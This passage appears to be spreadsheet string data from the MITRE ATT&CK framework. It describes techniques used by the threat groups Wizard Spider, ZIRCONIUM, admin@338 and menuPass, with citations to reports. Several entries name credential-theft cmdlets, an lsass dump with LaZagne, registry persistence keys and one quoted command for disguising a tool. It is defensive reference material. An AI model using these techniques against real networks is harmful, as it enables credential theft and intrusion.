  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has created and used new accounts within a victim's Active Directory environment to maintain persistence.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--970860bd-6183-4728-8f34-a5a1ad199655</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used administrative accounts, including Domain Admin, to move laterally within a victim network.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>relationship--2dd33387-a109-46cd-8204-cb79a62e4830</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has injected malicious DLLs into memory with read, write, and execute permissions.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>relationship--f9d9b5aa-f4d6-46fc-8831-21ca405ab8e5</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has leveraged ProtonMail email addresses in ransom notes when delivering [Ryuk](https://attack.mitre.org/software/S0446) ransomware.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--a28b6a04-5562-4550-91bd-6397c0c9fe3f</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.(Citation: CrowdStrike Grim Spider May 2019)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--c51d9123-7f7e-41e6-8cf7-7c7dc4170ca0</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated victim information using FTP.(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>relationship--5fe0a46c-7a06-4aea-9768-d611d3f3116d</t>
  </si>
  <si>
    <t xml:space="preserve">[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated stolen victim data to various cloud storage providers.(Citation: Mandiant FIN12 Oct 2021) </t>
  </si>
  <si>
    <t>relationship--743f2f00-57d0-4df8-94db-b044e2551890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</si>
  <si>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</si>
  <si>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relationship--14f3eebf-40c3-48d5-ad62-356d57ccf2dc</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has accessed victim networks by using stolen credentials to access the corporate VPN infrastructure.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>relationship--79b0a6bc-4061-468c-ac1b-eef3dc3fb419</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used file deletion to remove some modules and configurations from an infected host after use.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>relationship--5c252868-1474-4fed-b3b2-07a6d3415034</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used PowerShell cmdlets `Get-GPPPassword` and `Find-GPOPassword` to find unsecured credentials in a compromised network group policy.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--5c98e0bb-7451-4c61-a798-4306b89b1e61</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) can transfer malicious payloads such as ransomware to compromised machines.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--a137a1d7-d40b-4565-8377-98a3065d5fec</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</si>
  <si>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</si>
  <si>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relationship--773fc200-e44d-4049-b972-043c1e3d9035</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</si>
  <si>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</si>
  <si>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relationship--72b30ddb-137c-4799-bacd-ab17aa2d01fc</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>relationship--9bd4212c-2e17-41e2-9ff3-1448642ce958</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has dumped the lsass.exe memory to harvest credentials with the use of open-source tool [LaZagne](https://attack.mitre.org/software/S0349).(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--bfd2f3f1-3a5f-4500-be4e-39e3f8d6cb8e</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used stolen credentials to copy tools into the &lt;code&gt;%TEMP%&lt;/code&gt; directory of domain controllers.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>relationship--4f243ab6-812f-4fd3-9607-8d94409a94c1</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has created local administrator accounts to maintain persistence in compromised networks.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--0038b0b8-f51c-4fd1-8b04-2fd7ebd1d61d</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has staged ZIP files in local directories such as, `C:\PerfLogs\1\` and `C:\User\1\` prior to exfiltration.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--97a62430-6a83-4ead-b8c7-ce47f5d0cac0</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</si>
  <si>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</si>
  <si>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relationship--53e1bf2f-7ab4-4173-879b-9975618c4527</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims into clicking a malicious link delivered through spearphishing.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)</t>
  </si>
  <si>
    <t>relationship--b9dcab92-6b0d-43c7-a122-90eccb016b9d</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</si>
  <si>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</si>
  <si>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relationship--7e555910-0e1b-403d-a369-e7a2e8e61670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</si>
  <si>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</si>
  <si>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relationship--75f0ea4c-5b88-4b14-9859-67379f4ba9b0</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</si>
  <si>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</si>
  <si>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relationship--a1e10048-626c-4e64-9bdb-fd576be8c19f</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the “net view” command to locate mapped network shares.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)</t>
  </si>
  <si>
    <t>relationship--eaebb080-e57e-4c06-84df-376cc8bff09e</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the `Invoke-SMBExec` PowerShell cmdlet to execute the pass-the-hash technique and utilized stolen password hashes to move laterally.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--43fec1ed-cc26-4036-95c0-1598150f3916</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</si>
  <si>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</si>
  <si>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relationship--73baa214-fbe6-477e-9beb-d1a08a6d117f</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used process injection to execute payloads to escalate privileges.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--3a5b04dd-815c-4f52-be7a-e997625c18e6</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</si>
  <si>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</si>
  <si>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relationship--f3cc3739-9dea-41c9-ac82-038b9c92bdb0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</si>
  <si>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</si>
  <si>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relationship--43fabcba-66b6-45dc-b905-926f0a0a2bba</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the WebDAV protocol to execute [Ryuk](https://attack.mitre.org/software/S0446) payloads hosted on network file shares.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--4340d15d-5577-4b4e-8e5b-570b9ab3a147</t>
  </si>
  <si>
    <t>11 October 2023</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</si>
  <si>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</si>
  <si>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relationship--df13cae2-4e20-4e89-ae60-6bd8b99e2342</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has utilized `rundll32.exe` to deploy ransomware commands with the use of WebDAV.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--6924c49b-0f86-4712-9600-f91b21fa5691</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>relationship--2bb3c950-2099-4d7d-ac13-05a1470fc3c6</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</si>
  <si>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</si>
  <si>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relationship--57f8c6d0-406d-4e97-b3ff-5b2f0274231b</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has acquired credentials from the SAM/SECURITY registry hives.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>relationship--c96e7dda-d05c-458a-8332-9e7851bb4775</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI to identify anti-virus products installed on a victim's machine.(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>relationship--61c802ec-b415-4161-bf15-3a8c5cc0a243</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</si>
  <si>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</si>
  <si>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relationship--f3b210e4-9784-4305-8cad-6bdb4d44250f</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>relationship--cd283aa1-23f1-4516-9198-9d565bd4a431</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has utilized the PowerShell script `Get-DataInfo.ps1` to collect installed backup software information from a compromised machine.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--87d7a5b5-8f45-4a88-bc3c-f73f67a50255</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</si>
  <si>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</si>
  <si>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relationship--c671056c-f213-4084-9e9e-3361274ceb80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</si>
  <si>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</si>
  <si>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relationship--d87925c8-23ed-4913-81d6-c4d93d65c798</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</si>
  <si>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</si>
  <si>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relationship--e24411cf-6274-4b6b-87b4-b90b01146c8d</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</si>
  <si>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</si>
  <si>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relationship--a25300cb-c2b7-4968-b1d7-cc4d5fe5bb4b</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used "whoami" to identify the local user and their privileges.(Citation: Sophos New Ryuk Attack October 2020)</t>
  </si>
  <si>
    <t>relationship--aca710ff-23a3-4c78-b75a-dfe6cad337a9</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</si>
  <si>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</si>
  <si>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relationship--260a6771-1b29-49b6-ad42-6c43e68b11dc</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used valid credentials for privileged accounts with the goal of accessing domain controllers.(Citation: CrowdStrike Grim Spider May 2019)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--ad06b85a-a0df-41aa-8f45-f41504987918</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used HTTP for network communications.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>relationship--93cd9a2c-48e3-4a95-90fb-6436afcfa7a8</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used `cmd.exe` to execute commands on a victim's machine.(Citation: DFIR Ryuk's Return October 2020)(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--1ca344f1-97fe-453c-9f12-86130ddcebbc</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used PowerShell cmdlet `Invoke-WCMDump` to enumerate Windows credentials in the Credential Manager in a compromised network.(Citation: Mandiant FIN12 Oct 2021)</t>
  </si>
  <si>
    <t>relationship--e8e8e281-398c-4cec-bcc5-d12d28bada31</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.(Citation: Sophos New Ryuk Attack October 2020)</t>
  </si>
  <si>
    <t>relationship--4e3b7cf3-298e-4db2-a920-375abd50280d</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</si>
  <si>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</si>
  <si>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relationship--1fa97951-8eba-4771-bc42-8084967f0c65</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Window Remote Management to move laterally through a victim network.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)</t>
  </si>
  <si>
    <t>relationship--f947ae1c-1042-469d-b00e-84784e406cec</t>
  </si>
  <si>
    <t xml:space="preserve">[Wizard Spider](https://attack.mitre.org/groups/G0102) has installed [TrickBot](https://attack.mitre.org/software/S0266) as a service named ControlServiceA in order to establish persistence.(Citation: CrowdStrike Grim Spider May 2019)(Citation: Mandiant FIN12 Oct 2021) </t>
  </si>
  <si>
    <t>relationship--2b5965fe-b178-4c03-91af-942491c79302</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has established persistence using Userinit by adding the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>relationship--79e8a269-8ef5-4795-94ce-72bfbb03c7cb</t>
  </si>
  <si>
    <t>G0128</t>
  </si>
  <si>
    <t>ZIRCONIUM</t>
  </si>
  <si>
    <t>intrusion-set--4283ae19-69c7-4347-a35e-b56f08eb660b</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--f309c2e1-779f-4ff4-b6b7-579aca478239</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--28757531-79b3-4c51-8e6c-b9b317a06abd</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.(Citation: Check Point APT31 February 2021)</t>
  </si>
  <si>
    <t>relationship--584bbe94-c7bf-4039-970c-545da4e2bf92</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has purchased domains for use in targeted campaigns.(Citation: Microsoft Targeting Elections September 2020)</t>
  </si>
  <si>
    <t>relationship--6de1ba44-79c0-42d1-ab75-d816904ecee8</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has exfiltrated files via the Dropbox API C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--9ccf0f5a-e1c1-4be1-b823-cf087a07c670</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has exfiltrated stolen data to Dropbox.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--a9fedca4-fd68-4e3f-a564-cb9c168a8e4e</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has exploited CVE-2017-0005 for local privilege escalation.(Citation: Check Point APT31 February 2021)</t>
  </si>
  <si>
    <t>relationship--cf752570-48f5-40b6-b448-b4bc009ae5df</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used tools to download malicious files to compromised hosts.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--ddc7af3d-f8d7-468a-b9ed-59823f96fac2</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used malicious links in e-mails to lure victims into downloading malware.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--aeffbd1d-a962-492a-a6bf-670b70f01abb</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has created a run key named &lt;code&gt;Dropbox Update Setup&lt;/code&gt; to mask a persistence mechanism for a malicious binary.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--baefaf38-da2d-4864-9c96-3bf2352bc20b</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has spoofed legitimate applications in phishing lures and changed file extensions to conceal  installation of malware.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--a3990ec1-b4bb-43dd-b7d8-51bd3cb7e1c7</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used the msiexec.exe command-line utility to download and execute malicious MSI files.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--d220a65b-c4bf-4a23-b62d-6beb81eb646a</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) targeted presidential campaign staffers with credential phishing e-mails.(Citation: Google Election Threats October 2020)</t>
  </si>
  <si>
    <t>relationship--1023acea-b162-406d-a40d-201fc005d5ad</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used Python-based implants to interact with compromised hosts.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--3b689978-c74b-48e6-8d5e-73b3a6a6ea9d</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to query the Registry for proxy settings.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--1558f550-390d-4c40-a2f7-c9aa1fcf9f1b</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has created a Registry Run key named &lt;code&gt;Dropbox Update Setup&lt;/code&gt; to establish persistence for a malicious Python binary.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--3d3fa163-626d-41b8-85c1-f815c458ad19</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used multi-stage packers for exploit code.(Citation: Check Point APT31 February 2021)</t>
  </si>
  <si>
    <t>relationship--ae5e7681-f93e-4b5f-80f9-8235a9015e7f</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used malicious links in e-mails to deliver malware.(Citation: Microsoft Targeting Elections September 2020)(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--671a20b9-ad4c-468f-9871-be3545907dd2</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used web beacons in e-mails to track hits to attacker-controlled URL's.(Citation: Microsoft Targeting Elections September 2020)</t>
  </si>
  <si>
    <t>relationship--5bb51393-199c-48a1-b1fd-7f851fee0562</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used AES encrypted communications in C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--53da7e18-3812-47d5-a8de-af49e84f796a</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to capture the processor architecture of a compromised host in order to register it with C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--0e07a552-cea0-47f0-b96b-009a19c3e09a</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to enumerate proxy settings in the target environment.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--efb06e50-f3ac-4149-927b-d97505a4f551</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to capture the username on a compromised host in order to register it with C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--7b143b11-1fe5-4dc1-9790-3cd05659adc4</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to capture the time on a compromised host in order to register it with C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--576c98f3-5753-4242-a5e3-7c0f769c27a1</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used GitHub to host malware linked in spearphishing e-mails.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--1c44fd69-456d-43af-ae85-73239e295ff0</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to open a Windows Command Shell on a remote host.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>relationship--1b42c337-1bb7-4b42-9332-238b5edb6a63</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--e4b036ec-b7d4-40a7-9a85-25423a1027c9</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</si>
  <si>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</si>
  <si>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relationship--5c816fc0-c4e3-47ef-8193-ef88eabdfc7e</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</si>
  <si>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</si>
  <si>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relationship--c4962ae6-91e2-407d-9f42-aa0381574476</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</si>
  <si>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</si>
  <si>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relationship--7d047513-5fbf-4d9e-8a5d-54317123e34c</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--e752cfb4-7865-4590-b355-eb1f1b851c5e</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) actors used the following command to rename one of their tools to a benign file name: &lt;code&gt;ren "%temp%\upload" audiodg.exe&lt;/code&gt;(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--4da943df-a7dc-499f-a8b7-ca8d298d8ff6</t>
  </si>
  <si>
    <t>[admin@338](https://attack.mitre.org/groups/G0018) has sent emails with malicious Microsoft Office documents attached.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--1a7f1f1e-511a-44bf-8d9e-fd3260febfc8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</si>
  <si>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</si>
  <si>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relationship--eb85fa2e-3c50-4130-9717-8688237fecbc</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</si>
  <si>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</si>
  <si>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relationship--1b141c9e-a679-40c7-ad7b-ac40ac586471</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</si>
  <si>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</si>
  <si>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relationship--9fef204f-163a-4c9d-b9b1-8a168074063a</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</si>
  <si>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</si>
  <si>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relationship--e6e324d1-b775-48bb-ac9f-02fcc2428752</t>
  </si>
  <si>
    <t>Following exploitation with [LOWBALL](https://attack.mitre.org/software/S0042) malware, [admin@338](https://attack.mitre.org/groups/G0018) actors created a file containing a list of commands to be executed on the compromised computer.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>relationship--fb6f077c-06a2-46bb-9aef-959ef818d4aa</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has encrypted files and information before exfiltration.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>relationship--d844fdcc-a0d1-46b4-a4dc-f56063ef9584</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has compressed files before exfiltration using TAR and RAR.(Citation: PWC Cloud Hopper April 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--17262c58-2f41-41d2-a86a-5bc86642ddb4</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used the Csvde tool to collect Active Directory files and data.(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--f2f93fbb-2164-4de7-9d0b-24ad93caf7f2</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used [Wevtutil](https://attack.mitre.org/software/S0645) to remove PowerShell execution logs.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--a68fb27c-1aaf-474f-b97c-aff986eb5bbe</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has resized and added data to the certificate table to enable the signing of modified files with legitimate signatures.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--a802ece1-2efd-4243-8db2-568b59a9c496</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used DLL search order hijacking.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>relationship--ffee4cd1-f193-4dbc-9f47-6fe47e1523eb</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</si>
  <si>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</si>
  <si>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relationship--d4d07662-749c-4116-a83c-e4045eddad43</t>
  </si>
  <si>
    <t xml:space="preserve">[menuPass](https://attack.mitre.org/groups/G0045) has collected various files from the compromised computers.(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)
</t>
  </si>
  <si>
    <t>relationship--dfedbce3-afe2-46f4-80fb-7f3e802c5f03</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has collected data from remote systems by mounting network shares with &lt;code&gt;net use&lt;/code&gt; and using Robocopy to transfer data.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>relationship--c2909563-2b7e-48d6-b165-05b8eff63862</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</si>
  <si>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</si>
  <si>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relationship--a6ddb76d-4317-4cfd-9e1d-57d8a0c5fb21</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used the Microsoft administration tool csvde.exe to export Active Directory data.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--5a6942dc-eab7-4f45-b5fa-6149774e2acc</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has registered malicious domains for use in intrusion campaigns.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>relationship--f34e5f17-c0ac-4f1b-b45b-e6076e69721a</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--9e27b122-a10d-4f0a-8ca8-6040d8879586</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used tools to exploit the ZeroLogon vulnerability (CVE-2020-1472).(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--e31ca67c-1662-4d27-b349-44f3dda2a872</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used a global service provider's IP as a proxy for C2 traffic from a victim.(Citation: FireEye APT10 April 2017)(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--3a2d591a-f918-44b3-9e75-7520906b9aa3</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used dynamic DNS service providers to host malicious domains.(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>relationship--50b623c1-828f-4a2b-bb9e-38600b071563</t>
  </si>
  <si>
    <t>A [menuPass](https://attack.mitre.org/groups/G0045) macro deletes files after it has decoded and decompressed them.(Citation: Accenture Hogfish April 2018)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>relationship--0741e02b-edaa-43a4-a96c-d6baf2d29015</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.(Citation: Symantec Cicada November 2020)</t>
  </si>
  <si>
    <t>relationship--ca295c89-bee0-4702-b0e1-61416023bacb</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has installed updates and new malware on victims.(Citation: PWC Cloud Hopper April 2017)(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>relationship--2cc93cb7-fbe6-4c79-b619-a2eb877de1cf</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used &lt;code&gt;InstallUtil.exe&lt;/code&gt; to execute malicious software.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--70fa0bd3-3fbb-4fda-9de2-2b751f9552e7</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used key loggers to steal usernames and passwords.(Citation: District Court of NY APT10 Indictment December 2018)</t>
  </si>
  <si>
    <t>relationship--5680146f-fc33-4b3e-bbc0-66a7f74587d3</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Github AD-Pentest-Script)</t>
  </si>
  <si>
    <t>relationship--c69ee5f4-161a-4d2b-bad4-cc7929596bd3</t>
  </si>
  <si>
    <t>[menuPass](https://attack.mitre.org/groups/G0045) stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.(Citation: PWC Cloud Hopper April 2017)</t>
  </si>
  <si>
    <t>relationship--bbd29878-c16a-45ee-9785-78550f080d83</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</si>
  <si>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</si>
  <si>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relationship--350e9dad-4dd3-450f-b649-60340710505a</t>
  </si>
  <si>
